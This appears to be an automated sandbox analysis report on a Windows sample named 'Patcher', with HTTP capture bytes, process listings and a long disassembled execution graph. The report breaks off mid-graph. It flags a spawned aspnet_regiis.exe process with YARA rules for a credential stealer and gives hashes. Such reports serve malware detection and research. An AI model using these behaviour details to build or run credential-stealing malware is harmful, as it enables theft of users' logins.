                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: 0b e0 1c 35 5b f1 42 6c 00 f6 d1 16 e9 fe ff 00 65 f6 b9 d6 a3 42 63 90 6e ce d8 d0 db ff 74 fb 38 6c 7c 17 d4 2d c8 e6 9f ab be 7f f8 96 04 61 bb 51 00 b7 17 22 f3 43 19 7b a2 87 62 f3 8d ec 50 30 1c 66 bb 7b 9b a5 3f 67 dd fa 19 5c 1f c2 cb 9d c2 b2 0b b2 8f ee 97 66 de 6a 50 b3 39 8d ac 6d 8c fb fe d2 37 c7 4b 01 ec c1 73 02 22 ab 16 63 a4 4e 3a f9 72 3f 34 bb 3a c8 d2 8a 26 2c f8 c9 e2 9c c7 5f cd 6f 03 fc 04 e2 af 11 62 10 2e 18 b7 f5 eb d9 a5 d1 24 11 8a 2f 64 ee 98 9f 81 90 79 58 2f ba 43 b0 29 4b eb 10 38 6c 9d 5e 5b 63 b4 1a 98 d6 84 36 2d c5 f0 d3 1b 79 28 e6 26 c5 dc f3 2c 6b 3d e9 d3 f5 34 5e 30 b9 81 9e b1 03 4d bf 84 35 16 28 af 93 6a 65 d3 15 eb 03 65 45 c6 74 de 28 27 86 7b 4b 31 9b 55 e6 bd 5d 11 df f4 5b 95 1e 8a e7 3c b8 c6 6f 01 d8 b9
                                                                                            Data Ascii: 5[BleBcnt8l|-aQ"C{bP0f{?g\fjP9m7Ks"cN:r?4:&,_ob.$/dyX/C)K8l^[c6-y(&,k=4^0M5(jeeEt('{K1U][<o
                                                                                            2025-01-05 19:42:05 UTC1143INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:42:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=j37pr2unmrmhioeu5ma9gh2pt8; expires=Thu, 01 May 2025 13:28:43 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JiLLabQWxzz8z%2FKXujta%2FE8nsTwVoD47u%2F2Uf4UK5IpbizSn%2BfXqYuxwR%2FIWz5zBzevgVe%2F1%2BNoY3MU7MpVl25hi4P7Tc8KZXaIilUYa0lP6AyZhmCXPzSBhbFkndfQdf4HOmQ%2F"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fd5f302ae2e4364-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1722&rtt_var=673&sent=196&recv=587&lost=0&retrans=0&sent_bytes=2851&recv_bytes=572494&delivery_rate=1592148&cwnd=206&unsent_bytes=0&cid=32b920bc2b7573a8&ts=3227&x=0"


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:14:41:52
                                                                                            Start date:05/01/2025
                                                                                            Path:C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Patcher_I5cxa9AN.exe"
                                                                                            Imagebase:0x310000
                                                                                            File size:493'568 bytes
                                                                                            MD5 hash:F23B6BCE35ED7E7FD538A426DEFD13B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:14:41:52
                                                                                            Start date:05/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:14:41:53
                                                                                            Start date:05/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                            Imagebase:0x360000
                                                                                            File size:43'016 bytes
                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1714011851.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1714130661.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.5%
                                                                                              Dynamic/Decrypted Code Coverage:1.8%
                                                                                              Signature Coverage:7%
                                                                                              Total number of Nodes:995
                                                                                              Total number of Limit Nodes:18
                                                                                              execution_graph 17111 6cde710e 17112 6cde714c 17111->17112 17113 6cde7119 17111->17113 17150 6cde7268 17112->17150 17115 6cde713e 17113->17115 17116 6cde711e 17113->17116 17123 6cde7161 17115->17123 17118 6cde7134 17116->17118 17119 6cde7123 17116->17119 17142 6cde771b 17118->17142 17122 6cde7128 17119->17122 17137 6cde773a 17119->17137 17124 6cde716d __FrameHandler3::FrameUnwindToState 17123->17124 17173 6cde77ab 17124->17173 17126 6cde7174 __DllMainCRTStartup@12 17127 6cde719b 17126->17127 17128 6cde7260 17126->17128 17132 6cde71d7 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 17126->17132 17184 6cde770d 17127->17184 17192 6cde794a IsProcessorFeaturePresent 17128->17192 17131 6cde7267 17132->17122 17133 6cde71aa __RTC_Initialize 17133->17132 17187 6cde762b InitializeSListHead 17133->17187 17135 6cde71b8 17135->17132 17188 6cde76e2 17135->17188 17286 6cdeadf3 17137->17286 17591 6cde862c 17142->17591 17145 6cde7724 17145->17122 17148 6cde7737 17148->17122 17149 6cde8637 21 API calls 17149->17145 17151 6cde7274 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 17150->17151 17152 6cde72a5 17151->17152 17153 6cde7310 17151->17153 17166 6cde727d 17151->17166 17611 6cde777b 17152->17611 17154 6cde794a __DllMainCRTStartup@12 4 API calls 17153->17154 17158 6cde7317 __FrameHandler3::FrameUnwindToState 17154->17158 17156 6cde72aa 17620 6cde7637 17156->17620 17159 6cde734d dllmain_raw 17158->17159 17168 6cde7348 __DllMainCRTStartup@12 17158->17168 17170 6cde7333 17158->17170 17161 6cde7367 dllmain_crt_dispatch 17159->17161 17159->17170 17160 6cde72af __RTC_Initialize __DllMainCRTStartup@12 17623 6cde791c 17160->17623 17161->17168 17161->17170 17165 6cde73b9 17167 6cde73c2 dllmain_crt_dispatch 17165->17167 17165->17170 17166->17122 17169 6cde73d5 dllmain_raw 17167->17169 17167->17170 17168->17165 17171 6cde7268 __DllMainCRTStartup@12 81 API calls 17168->17171 17169->17170 17170->17122 17172 6cde73ae dllmain_raw 17171->17172 17172->17165 17174 6cde77b4 17173->17174 17196 6cde7b18 IsProcessorFeaturePresent 17174->17196 17178 6cde77c5 17179 6cde77c9 17178->17179 17206 6cdeadd6 17178->17206 17179->17126 17182 6cde77e0 17182->17126 17280 6cde77e4 17184->17280 17186 6cde7714 17186->17133 17187->17135 17189 6cde76e7 ___scrt_release_startup_lock 17188->17189 17190 6cde76f0 17189->17190 17191 6cde7b18 IsProcessorFeaturePresent 17189->17191 17190->17132 17191->17190 17193 6cde7960 __CreateFrameInfo 17192->17193 17194 6cde7a0b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17193->17194 17195 6cde7a56 __CreateFrameInfo 17194->17195 17195->17131 17197 6cde77c0 17196->17197 17198 6cde860d 17197->17198 17215 6cde8ae7 17198->17215 17202 6cde861e 17203 6cde8629 17202->17203 17229 6cde8b23 17202->17229 17203->17178 17205 6cde8616 17205->17178 17271 6cded8f8 17206->17271 17209 6cde8642 17210 6cde864b 17209->17210 17211 6cde8655 17209->17211 17212 6cde8acc ___vcrt_uninitialize_ptd 6 API calls 17210->17212 17211->17179 17213 6cde8650 17212->17213 17214 6cde8b23 ___vcrt_uninitialize_locks DeleteCriticalSection 17213->17214 17214->17211 17216 6cde8af0 17215->17216 17218 6cde8b19 17216->17218 17219 6cde8612 17216->17219 17233 6cde911b 17216->17233 17220 6cde8b23 ___vcrt_uninitialize_locks DeleteCriticalSection 17218->17220 17219->17205 17221 6cde8a99 17219->17221 17220->17219 17252 6cde902c 17221->17252 17226 6cde8ac9 17226->17202 17228 6cde8aae 17228->17202 17230 6cde8b2e 17229->17230 17232 6cde8b4d 17229->17232 17231 6cde8b38 DeleteCriticalSection 17230->17231 17231->17231 17231->17232 17232->17205 17238 6cde8fe3 17233->17238 17236 6cde9153 InitializeCriticalSectionAndSpinCount 17237 6cde913e 17236->17237 17237->17216 17239 6cde8ffb 17238->17239 17242 6cde901e 17238->17242 17239->17242 17244 6cde8f49 17239->17244 17242->17236 17242->17237 17243 6cde9010 GetProcAddress 17243->17242 17250 6cde8f55 ___vcrt_FlsSetValue 17244->17250 17245 6cde8fc9 17245->17242 17245->17243 17246 6cde8f6b LoadLibraryExW 17247 6cde8f89 GetLastError 17246->17247 17248 6cde8fd0 17246->17248 17247->17250 17248->17245 17249 6cde8fd8 FreeLibrary 17248->17249 17249->17245 17250->17245 17250->17246 17251 6cde8fab LoadLibraryExW 17250->17251 17251->17248 17251->17250 17253 6cde8fe3 ___vcrt_FlsSetValue 5 API calls 17252->17253 17254 6cde9046 17253->17254 17255 6cde905f TlsAlloc 17254->17255 17256 6cde8aa3 17254->17256 17256->17228 17257 6cde90dd 17256->17257 17258 6cde8fe3 ___vcrt_FlsSetValue 5 API calls 17257->17258 17259 6cde90f7 17258->17259 17260 6cde9112 TlsSetValue 17259->17260 17261 6cde8abc 17259->17261 17260->17261 17261->17226 17262 6cde8acc 17261->17262 17263 6cde8ad6 17262->17263 17264 6cde8adc 17262->17264 17266 6cde9067 17263->17266 17264->17228 17267 6cde8fe3 ___vcrt_FlsSetValue 5 API calls 17266->17267 17268 6cde9081 17267->17268 17269 6cde908d 17268->17269 17270 6cde9099 TlsFree 17268->17270 17269->17264 17270->17269 17272 6cded908 17271->17272 17273 6cde77d2 17271->17273 17272->17273 17275 6cded7bc 17272->17275 17273->17182 17273->17209 17276 6cded7c3 17275->17276 17277 6cded806 GetStdHandle 17276->17277 17278 6cded868 17276->17278 17279 6cded819 GetFileType 17276->17279 17277->17276 17278->17272 17279->17276 17281 6cde77f4 17280->17281 17282 6cde77f0 17280->17282 17283 6cde794a __DllMainCRTStartup@12 4 API calls 17281->17283 17285 6cde7801 ___scrt_release_startup_lock 17281->17285 17282->17186 17284 6cde786a 17283->17284 17285->17186 17292 6cdeb4eb 17286->17292 17289 6cde8637 17571 6cde89c3 17289->17571 17293 6cde773f 17292->17293 17294 6cdeb4f5 17292->17294 17293->17289 17300 6cded547 17294->17300 17316 6cded3e5 17300->17316 17302 6cded563 17303 6cded57e TlsGetValue 17302->17303 17304 6cdeb4fc 17302->17304 17304->17293 17305 6cded586 17304->17305 17306 6cded3e5 __dosmaperr 5 API calls 17305->17306 17307 6cded5a2 17306->17307 17308 6cded5c0 TlsSetValue 17307->17308 17309 6cdeb50f 17307->17309 17310 6cdeb3b2 17309->17310 17311 6cdeb3bd 17310->17311 17315 6cdeb3cd 17310->17315 17330 6cdeb3d3 17311->17330 17315->17293 17317 6cded415 17316->17317 17321 6cded411 __dosmaperr 17316->17321 17317->17321 17322 6cded31a 17317->17322 17320 6cded42f GetProcAddress 17320->17321 17321->17302 17323 6cded32b ___vcrt_FlsSetValue 17322->17323 17324 6cded3c1 17323->17324 17325 6cded349 LoadLibraryExW 17323->17325 17329 6cded397 LoadLibraryExW 17323->17329 17324->17320 17324->17321 17326 6cded3c8 17325->17326 17327 6cded364 GetLastError 17325->17327 17326->17324 17328 6cded3da FreeLibrary 17326->17328 17327->17323 17328->17324 17329->17323 17329->17326 17331 6cdeb3e8 17330->17331 17332 6cdeb3ee 17330->17332 17333 6cdebc64 __freea 14 API calls 17331->17333 17334 6cdebc64 __freea 14 API calls 17332->17334 17333->17332 17335 6cdeb3fa 17334->17335 17336 6cdebc64 __freea 14 API calls 17335->17336 17337 6cdeb405 17336->17337 17338 6cdebc64 __freea 14 API calls 17337->17338 17339 6cdeb410 17338->17339 17340 6cdebc64 __freea 14 API calls 17339->17340 17341 6cdeb41b 17340->17341 17342 6cdebc64 __freea 14 API calls 17341->17342 17343 6cdeb426 17342->17343 17344 6cdebc64 __freea 14 API calls 17343->17344 17345 6cdeb431 17344->17345 17346 6cdebc64 __freea 14 API calls 17345->17346 17347 6cdeb43c 17346->17347 17348 6cdebc64 __freea 14 API calls 17347->17348 17349 6cdeb447 17348->17349 17350 6cdebc64 __freea 14 API calls 17349->17350 17351 6cdeb455 17350->17351 17362 6cdeb1ff 17351->17362 17356 6cdebc64 17357 6cdebc6f HeapFree 17356->17357 17358 6cdebc99 17356->17358 17357->17358 17359 6cdebc84 GetLastError 17357->17359 17358->17315 17360 6cdebc91 __dosmaperr 17359->17360 17502 6cdebbf4 17360->17502 17363 6cdeb20b __FrameHandler3::FrameUnwindToState 17362->17363 17378 6cdeb843 EnterCriticalSection 17363->17378 17365 6cdeb23f 17379 6cdeb25e 17365->17379 17367 6cdeb215 17367->17365 17369 6cdebc64 __freea 14 API calls 17367->17369 17369->17365 17370 6cdeb26a 17371 6cdeb276 __FrameHandler3::FrameUnwindToState 17370->17371 17383 6cdeb843 EnterCriticalSection 17371->17383 17373 6cdeb280 17384 6cdeb4a0 17373->17384 17375 6cdeb293 17388 6cdeb2b3 17375->17388 17378->17367 17382 6cdeb88b LeaveCriticalSection 17379->17382 17381 6cdeb24c 17381->17370 17382->17381 17383->17373 17385 6cdeb4d6 __dosmaperr 17384->17385 17386 6cdeb4af __dosmaperr 17384->17386 17385->17375 17386->17385 17391 6cdee4fb 17386->17391 17501 6cdeb88b LeaveCriticalSection 17388->17501 17390 6cdeb2a1 17390->17356 17392 6cdee57b 17391->17392 17395 6cdee511 17391->17395 17394 6cdebc64 __freea 14 API calls 17392->17394 17417 6cdee5c9 17392->17417 17396 6cdee59d 17394->17396 17395->17392 17399 6cdee544 17395->17399 17402 6cdebc64 __freea 14 API calls 17395->17402 17397 6cdebc64 __freea 14 API calls 17396->17397 17398 6cdee5b0 17397->17398 17404 6cdebc64 __freea 14 API calls 17398->17404 17405 6cdebc64 __freea 14 API calls 17399->17405 17418 6cdee566 17399->17418 17400 6cdebc64 __freea 14 API calls 17406 6cdee570 17400->17406 17401 6cdee5d7 17407 6cdee637 17401->17407 17416 6cdebc64 14 API calls __freea 17401->17416 17403 6cdee539 17402->17403 17419 6cdf0478 17403->17419 17409 6cdee5be 17404->17409 17410 6cdee55b 17405->17410 17411 6cdebc64 __freea 14 API calls 17406->17411 17412 6cdebc64 __freea 14 API calls 17407->17412 17414 6cdebc64 __freea 14 API calls 17409->17414 17447 6cdf0576 17410->17447 17411->17392 17413 6cdee63d 17412->17413 17413->17385 17414->17417 17416->17401 17459 6cdee66c 17417->17459 17418->17400 17420 6cdf0489 17419->17420 17446 6cdf0572 17419->17446 17421 6cdf049a 17420->17421 17422 6cdebc64 __freea 14 API calls 17420->17422 17423 6cdf04ac 17421->17423 17424 6cdebc64 __freea 14 API calls 17421->17424 17422->17421 17425 6cdf04be 17423->17425 17427 6cdebc64 __freea 14 API calls 17423->17427 17424->17423 17426 6cdf04d0 17425->17426 17428 6cdebc64 __freea 14 API calls 17425->17428 17429 6cdebc64 __freea 14 API calls 17426->17429 17430 6cdf04e2 17426->17430 17427->17425 17428->17426 17429->17430 17431 6cdebc64 __freea 14 API calls 17430->17431 17433 6cdf04f4 17430->17433 17431->17433 17432 6cdf0506 17434 6cdf0518 17432->17434 17436 6cdebc64 __freea 14 API calls 17432->17436 17433->17432 17435 6cdebc64 __freea 14 API calls 17433->17435 17437 6cdf052a 17434->17437 17438 6cdebc64 __freea 14 API calls 17434->17438 17435->17432 17436->17434 17439 6cdf053c 17437->17439 17440 6cdebc64 __freea 14 API calls 17437->17440 17438->17437 17441 6cdf054e 17439->17441 17443 6cdebc64 __freea 14 API calls 17439->17443 17440->17439 17442 6cdf0560 17441->17442 17444 6cdebc64 __freea 14 API calls 17441->17444 17445 6cdebc64 __freea 14 API calls 17442->17445 17442->17446 17443->17441 17444->17442 17445->17446 17446->17399 17448 6cdf0583 17447->17448 17458 6cdf05db 17447->17458 17449 6cdf0593 17448->17449 17450 6cdebc64 __freea 14 API calls 17448->17450 17451 6cdf05a5 17449->17451 17453 6cdebc64 __freea 14 API calls 17449->17453 17450->17449 17452 6cdf05b7 17451->17452 17454 6cdebc64 __freea 14 API calls 17451->17454 17455 6cdf05c9 17452->17455 17456 6cdebc64 __freea 14 API calls 17452->17456 17453->17451 17454->17452 17457 6cdebc64 __freea 14 API calls 17455->17457 17455->17458 17456->17455 17457->17458 17458->17418 17460 6cdee679 17459->17460 17464 6cdee698 17459->17464 17460->17464 17465 6cdf0604 17460->17465 17463 6cdebc64 __freea 14 API calls 17463->17464 17464->17401 17466 6cdee692 17465->17466 17467 6cdf0615 17465->17467 17466->17463 17468 6cdf05df __dosmaperr 14 API calls 17467->17468 17469 6cdf061d 17468->17469 17470 6cdf05df __dosmaperr 14 API calls 17469->17470 17471 6cdf0628 17470->17471 17472 6cdf05df __dosmaperr 14 API calls 17471->17472 17473 6cdf0633 17472->17473 17474 6cdf05df __dosmaperr 14 API calls 17473->17474 17475 6cdf063e 17474->17475 17476 6cdf05df __dosmaperr 14 API calls 17475->17476 17477 6cdf064c 17476->17477 17478 6cdebc64 __freea 14 API calls 17477->17478 17479 6cdf0657 17478->17479 17480 6cdebc64 __freea 14 API calls 17479->17480 17481 6cdf0662 17480->17481 17482 6cdebc64 __freea 14 API calls 17481->17482 17483 6cdf066d 17482->17483 17484 6cdf05df __dosmaperr 14 API calls 17483->17484 17485 6cdf067b 17484->17485 17486 6cdf05df __dosmaperr 14 API calls 17485->17486 17487 6cdf0689 17486->17487 17488 6cdf05df __dosmaperr 14 API calls 17487->17488 17489 6cdf069a 17488->17489 17490 6cdf05df __dosmaperr 14 API calls 17489->17490 17491 6cdf06a8 17490->17491 17492 6cdf05df __dosmaperr 14 API calls 17491->17492 17493 6cdf06b6 17492->17493 17494 6cdebc64 __freea 14 API calls 17493->17494 17495 6cdf06c1 17494->17495 17496 6cdebc64 __freea 14 API calls 17495->17496 17497 6cdf06cc 17496->17497 17498 6cdebc64 __freea 14 API calls 17497->17498 17499 6cdf06d7 17498->17499 17500 6cdebc64 __freea 14 API calls 17499->17500 17500->17466 17501->17390 17505 6cdeb668 GetLastError 17502->17505 17504 6cdebbf9 17504->17358 17506 6cdeb67e 17505->17506 17507 6cdeb684 17505->17507 17508 6cded547 __dosmaperr 6 API calls 17506->17508 17509 6cded586 __dosmaperr 6 API calls 17507->17509 17511 6cdeb688 SetLastError 17507->17511 17508->17507 17510 6cdeb6a0 17509->17510 17510->17511 17528 6cdebc07 17510->17528 17511->17504 17515 6cdeb6ce 17518 6cded586 __dosmaperr 6 API calls 17515->17518 17516 6cdeb6bd 17517 6cded586 __dosmaperr 6 API calls 17516->17517 17520 6cdeb6cb 17517->17520 17519 6cdeb6da 17518->17519 17521 6cdeb6de 17519->17521 17522 6cdeb6f5 17519->17522 17524 6cdebc64 __freea 12 API calls 17520->17524 17523 6cded586 __dosmaperr 6 API calls 17521->17523 17535 6cdeb319 17522->17535 17523->17520 17524->17511 17527 6cdebc64 __freea 12 API calls 17527->17511 17533 6cdebc14 __dosmaperr 17528->17533 17529 6cdebc54 17532 6cdebbf4 __dosmaperr 13 API calls 17529->17532 17530 6cdebc3f HeapAlloc 17531 6cdeb6b5 17530->17531 17530->17533 17531->17515 17531->17516 17532->17531 17533->17529 17533->17530 17540 6cded9a0 17533->17540 17549 6cdeb1ad 17535->17549 17543 6cded9cc 17540->17543 17544 6cded9d8 __FrameHandler3::FrameUnwindToState 17543->17544 17545 6cdeb843 __CreateFrameInfo EnterCriticalSection 17544->17545 17546 6cded9e3 __CreateFrameInfo 17545->17546 17547 6cdeda1a __dosmaperr LeaveCriticalSection 17546->17547 17548 6cded9ab 17547->17548 17548->17533 17550 6cdeb1b9 __FrameHandler3::FrameUnwindToState 17549->17550 17563 6cdeb843 EnterCriticalSection 17550->17563 17552 6cdeb1c3 17564 6cdeb1f3 17552->17564 17555 6cdeb2bf 17556 6cdeb2cb __FrameHandler3::FrameUnwindToState 17555->17556 17567 6cdeb843 EnterCriticalSection 17556->17567 17558 6cdeb2d5 17559 6cdeb4a0 __dosmaperr 14 API calls 17558->17559 17560 6cdeb2ed 17559->17560 17568 6cdeb30d 17560->17568 17563->17552 17565 6cdeb88b __CreateFrameInfo LeaveCriticalSection 17564->17565 17566 6cdeb1e1 17565->17566 17566->17555 17567->17558 17569 6cdeb88b __CreateFrameInfo LeaveCriticalSection 17568->17569 17570 6cdeb2fb 17569->17570 17570->17527 17572 6cde89d0 17571->17572 17578 6cde7744 17571->17578 17575 6cde89de 17572->17575 17579 6cde90a2 17572->17579 17573 6cde90dd ___vcrt_FlsSetValue 6 API calls 17576 6cde89ee 17573->17576 17575->17573 17584 6cde89a7 17576->17584 17578->17122 17580 6cde8fe3 ___vcrt_FlsSetValue 5 API calls 17579->17580 17581 6cde90bc 17580->17581 17582 6cde90d4 TlsGetValue 17581->17582 17583 6cde90c8 17581->17583 17582->17583 17583->17575 17585 6cde89be 17584->17585 17586 6cde89b1 17584->17586 17585->17578 17586->17585 17588 6cdeae79 17586->17588 17589 6cdebc64 __freea 14 API calls 17588->17589 17590 6cdeae91 17589->17590 17590->17585 17597 6cde8a07 17591->17597 17593 6cde7720 17593->17145 17594 6cdeade8 17593->17594 17595 6cdeb668 __dosmaperr 14 API calls 17594->17595 17596 6cde772c 17595->17596 17596->17148 17596->17149 17598 6cde8a13 GetLastError 17597->17598 17599 6cde8a10 17597->17599 17600 6cde90a2 ___vcrt_FlsGetValue 6 API calls 17598->17600 17599->17593 17601 6cde8a28 17600->17601 17602 6cde8a47 17601->17602 17603 6cde8a8d SetLastError 17601->17603 17604 6cde90dd ___vcrt_FlsSetValue 6 API calls 17601->17604 17602->17603 17603->17593 17605 6cde8a41 __CreateFrameInfo 17604->17605 17605->17602 17606 6cde8a69 17605->17606 17607 6cde90dd ___vcrt_FlsSetValue 6 API calls 17605->17607 17608 6cde90dd ___vcrt_FlsSetValue 6 API calls 17606->17608 17609 6cde8a7d 17606->17609 17607->17606 17608->17609 17610 6cdeae79 ___std_exception_copy 14 API calls 17609->17610 17610->17602 17612 6cde7780 ___scrt_release_startup_lock 17611->17612 17613 6cde7784 17612->17613 17616 6cde7790 __DllMainCRTStartup@12 17612->17616 17632 6cdeac52 17613->17632 17615 6cde778e 17615->17156 17617 6cde779d 17616->17617 17636 6cdea43b 17616->17636 17617->17156 17705 6cde85ea InterlockedFlushSList 17620->17705 17624 6cde7928 17623->17624 17628 6cde72ce 17624->17628 17709 6cdeadfb 17624->17709 17626 6cde7936 17627 6cde8642 ___scrt_uninitialize_crt 7 API calls 17626->17627 17627->17628 17629 6cde730a 17628->17629 17808 6cde779e 17629->17808 17633 6cdeac5e __EH_prolog3 17632->17633 17647 6cdeab1d 17633->17647 17635 6cdeac85 __DllMainCRTStartup@12 17635->17615 17637 6cdea468 17636->17637 17645 6cdea479 17636->17645 17664 6cdea503 GetModuleHandleW 17637->17664 17642 6cdea4b7 17642->17156 17671 6cdea2eb 17645->17671 17648 6cdeab29 __FrameHandler3::FrameUnwindToState 17647->17648 17655 6cdeb843 EnterCriticalSection 17648->17655 17650 6cdeab37 17656 6cdeab78 17650->17656 17655->17650 17657 6cdeab44 17656->17657 17658 6cdeab97 17656->17658 17660 6cdeab6c 17657->17660 17658->17657 17659 6cdebc64 __freea 14 API calls 17658->17659 17659->17657 17663 6cdeb88b LeaveCriticalSection 17660->17663 17662 6cdeab55 17662->17635 17663->17662 17665 6cdea46d 17664->17665 17665->17645 17666 6cdea55e GetModuleHandleExW 17665->17666 17667 6cdea5b1 17666->17667 17668 6cdea59d GetProcAddress 17666->17668 17669 6cdea5cd 17667->17669 17670 6cdea5c4 FreeLibrary 17667->17670 17668->17667 17669->17645 17670->17669 17672 6cdea2f7 __FrameHandler3::FrameUnwindToState 17671->17672 17686 6cdeb843 EnterCriticalSection 17672->17686 17674 6cdea301 17687 6cdea353 17674->17687 17676 6cdea30e 17691 6cdea32c 17676->17691 17679 6cdea4d2 17695 6cdea545 17679->17695 17681 6cdea4dc 17682 6cdea4f0 17681->17682 17683 6cdea4e0 GetCurrentProcess TerminateProcess 17681->17683 17684 6cdea55e __CreateFrameInfo 3 API calls 17682->17684 17683->17682 17685 6cdea4f8 ExitProcess 17684->17685 17686->17674 17690 6cdea35f __FrameHandler3::FrameUnwindToState __CreateFrameInfo 17687->17690 17688 6cdeac52 __DllMainCRTStartup@12 14 API calls 17689 6cdea3c3 __CreateFrameInfo 17688->17689 17689->17676 17690->17688 17690->17689 17694 6cdeb88b LeaveCriticalSection 17691->17694 17693 6cdea31a 17693->17642 17693->17679 17694->17693 17698 6cdeb8c7 17695->17698 17697 6cdea54a __CreateFrameInfo 17697->17681 17699 6cdeb8d6 __CreateFrameInfo 17698->17699 17700 6cdeb8e3 17699->17700 17702 6cded46a 17699->17702 17700->17697 17703 6cded3e5 __dosmaperr 5 API calls 17702->17703 17704 6cded486 17703->17704 17704->17700 17706 6cde85fa 17705->17706 17708 6cde7641 17705->17708 17707 6cdeae79 ___std_exception_copy 14 API calls 17706->17707 17706->17708 17707->17706 17708->17160 17710 6cdeae06 17709->17710 17711 6cdeae18 ___scrt_uninitialize_crt 17709->17711 17712 6cdeae14 17710->17712 17714 6cdee035 17710->17714 17711->17626 17712->17626 17717 6cdedec6 17714->17717 17720 6cdede1a 17717->17720 17721 6cdede26 __FrameHandler3::FrameUnwindToState 17720->17721 17728 6cdeb843 EnterCriticalSection 17721->17728 17723 6cdede9c 17737 6cdedeba 17723->17737 17726 6cdede30 ___scrt_uninitialize_crt 17726->17723 17729 6cdedd8e 17726->17729 17728->17726 17730 6cdedd9a __FrameHandler3::FrameUnwindToState 17729->17730 17740 6cdee152 EnterCriticalSection 17730->17740 17732 6cdedda4 ___scrt_uninitialize_crt 17733 6cdedddd 17732->17733 17741 6cdedfd0 17732->17741 17752 6cdede0e 17733->17752 17807 6cdeb88b LeaveCriticalSection 17737->17807 17739 6cdedea8 17739->17712 17740->17732 17742 6cdedfe5 ___std_exception_copy 17741->17742 17743 6cdedfec 17742->17743 17744 6cdedff7 17742->17744 17745 6cdedec6 ___scrt_uninitialize_crt 68 API calls 17743->17745 17755 6cdedf67 17744->17755 17748 6cdedff2 ___std_exception_copy 17745->17748 17748->17733 17750 6cdee018 17768 6cdef665 17750->17768 17806 6cdee166 LeaveCriticalSection 17752->17806 17754 6cdeddfc 17754->17726 17756 6cdedfa7 17755->17756 17757 6cdedf80 17755->17757 17756->17748 17761 6cdee3b7 17756->17761 17757->17756 17758 6cdee3b7 ___scrt_uninitialize_crt 29 API calls 17757->17758 17759 6cdedf9c 17758->17759 17779 6cdefe84 17759->17779 17762 6cdee3d8 17761->17762 17763 6cdee3c3 17761->17763 17762->17750 17764 6cdebbf4 __dosmaperr 14 API calls 17763->17764 17765 6cdee3c8 17764->17765 17790 6cdebb13 17765->17790 17769 6cdef676 17768->17769 17770 6cdef683 17768->17770 17771 6cdebbf4 __dosmaperr 14 API calls 17769->17771 17772 6cdef6cc 17770->17772 17774 6cdef6aa 17770->17774 17776 6cdef67b 17771->17776 17773 6cdebbf4 __dosmaperr 14 API calls 17772->17773 17775 6cdef6d1 17773->17775 17793 6cdef5c3 17774->17793 17778 6cdebb13 ___std_exception_copy 29 API calls 17775->17778 17776->17748 17778->17776 17781 6cdefe90 __FrameHandler3::FrameUnwindToState 17779->17781 17780 6cdefe98 17780->17756 17781->17780 17782 6cdefed1 17781->17782 17784 6cdeff17 17781->17784 17783 6cdeba96 ___std_exception_copy 29 API calls 17782->17783 17783->17780 17785 6cdef482 ___scrt_uninitialize_crt EnterCriticalSection 17784->17785 17786 6cdeff1d 17785->17786 17787 6cdeff3b 17786->17787 17788 6cdeff97 ___scrt_uninitialize_crt 62 API calls 17786->17788 17789 6cdeff8d ___scrt_uninitialize_crt LeaveCriticalSection 17787->17789 17788->17787 17789->17780 17791 6cdeba5f ___std_exception_copy 29 API calls 17790->17791 17792 